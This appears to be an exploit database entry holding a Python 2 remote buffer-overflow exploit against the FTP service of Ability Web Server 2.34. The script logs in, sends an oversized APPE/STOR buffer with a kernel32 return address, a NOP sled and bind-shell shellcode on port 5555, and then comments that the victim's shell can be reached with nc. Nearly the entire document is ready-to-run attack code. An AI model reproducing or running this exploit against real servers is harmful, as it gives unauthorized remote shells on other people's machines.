Ability Web Server(ftp) - Remote Buffer Overflow Exploit

#!/usr/bin/python

#====================================================

# Exploit Title : Ability Web Server(ftp) Remote Buffer Overflow Exploit

# Author : JoKeR_StEx

# Version : 2.34

# <3 Algeria <3

#====================================================

import socket,sys

print"[+] Usage : exploit.py <ip> <port(21)> \r\n"

junk="A" * 969

nop = "\x90" * 32

eip="\x7C\x83\x69\xF0" # call esp 7C8369F0 kernel32.dll

#Shellcode => windows/shell_bind_tcp LPORT=5555 size=>368

shellcode = ("\xda\xd0\xd9\x74\x24\xf4\x5e\x2b\xc9\xb1\x56\xbf\x9d\x28"

"\xd0\x22\x83\xee\xfc\x31\x7e\x14\x03\x7e\x89\xca\x25\xde"

"\x59\x83\xc6\x1f\x99\xf4\x4f\xfa\xa8\x26\x2b\x8e\x98\xf6"

"\x3f\xc2\x10\x7c\x6d\xf7\xa3\xf0\xba\xf8\x04\xbe\x9c\x37"

"\x95\x0e\x21\x9b\x55\x10\xdd\xe6\x89\xf2\xdc\x28\xdc\xf3"

"\x19\x54\x2e\xa1\xf2\x12\x9c\x56\x76\x66\x1c\x56\x58\xec"

"\x1c\x20\xdd\x33\xe8\x9a\xdc\x63\x40\x90\x97\x9b\xeb\xfe"

"\x07\x9d\x38\x1d\x7b\xd4\x35\xd6\x0f\xe7\x9f\x26\xef\xd9"

"\xdf\xe5\xce\xd5\xd2\xf4\x17\xd1\x0c\x83\x63\x21\xb1\x94"

"\xb7\x5b\x6d\x10\x2a\xfb\xe6\x82\x8e\xfd\x2b\x54\x44\xf1"

"\x80\x12\x02\x16\x17\xf6\x38\x22\x9c\xf9\xee\xa2\xe6\xdd"

"\x2a\xee\xbd\x7c\x6a\x4a\x10\x80\x6c\x32\xcd\x24\xe6\xd1"

"\x1a\x5e\xa5\xbd\xef\x6d\x56\x3e\x67\xe5\x25\x0c\x28\x5d"

"\xa2\x3c\xa1\x7b\x35\x42\x98\x3c\xa9\xbd\x22\x3d\xe3\x79"

"\x76\x6d\x9b\xa8\xf6\xe6\x5b\x54\x23\xa8\x0b\xfa\x9b\x09"

"\xfc\xba\x4b\xe2\x16\x35\xb4\x12\x19\x9f\xc3\x14\xd7\xfb"

"\x80\xf2\x1a\xfc\x33\xb0\x92\x1a\x51\xa6\xf2\xb5\xcd\x04"

"\x21\x0e\x6a\x76\x03\x22\x23\xe0\x1b\x2c\xf3\x0f\x9c\x7a"

"\x50\xa3\x34\xed\x22\xaf\x80\x0c\x35\xfa\xa0\x47\x0e\x6d"

"\x3a\x36\xdd\x0f\x3b\x13\xb5\xac\xae\xf8\x45\xba\xd2\x56"

"\x12\xeb\x25\xaf\xf6\x01\x1f\x19\xe4\xdb\xf9\x62\xac\x07"

"\x3a\x6c\x2d\xc5\x06\x4a\x3d\x13\x86\xd6\x69\xcb\xd1\x80"

"\xc7\xad\x8b\x62\xb1\x67\x67\x2d\x55\xf1\x4b\xee\x23\xfe"

"\x81\x98\xcb\x4f\x7c\xdd\xf4\x60\xe8\xe9\x8d\x9c\x88\x16"

"\x44\x25\xb8\x5c\xc4\x0c\x51\x39\x9d\x0c\x3c\xba\x48\x52"

"\x39\x39\x78\x2b\xbe\x21\x09\x2e\xfa\xe5\xe2\x42\x93\x83"

"\x04\xf0\x94\x81");

rest="C" * 627

buffer = junk + eip + nop + shellcode + rest

# Connection

host = sys.argv[1]

port = sys.argv[2]

dz=socket.socket(socket.AF_INET, socket.SOCK_STREAM)

dz.connect((host,int(port)))

data=dz.recv(1024)

print "[+]" + data

dz.send("USER ftp\r\n")

data=dz.recv(1024)

print"[+]" + data

dz.send("PASS ftp\r\n")

data=dz.recv(1024)

print"[+]" + data

# Remote Buffer File

dz.send("APPE" + buffer + "\r\n")

data=dz.recv(1024)

print"[+]" + data

#STOR(save) buffer

dz.send("STOR" + buffer + "\r\n")

data=dz.recv(1024)

print"[+]" + data

print"[+]"+"Sending Shellcode ..."

dz.close()

# Cennect To Victim " nc -nvv <ip victim > 5555

################################################

#The Black Devils ,Team Dz S.O.S

#Sec W0rms

#L0ve Algeria <3 Security <3 Penetration Testing

################################################

EKU-ID: 3705	CVE:	OSVDB-ID:
Author: JoKeR_StEx	Published: 2013-12-16	Verified:
Download:

Ability Web Server(ftp) - Remote Buffer Overflow Exploit

Rating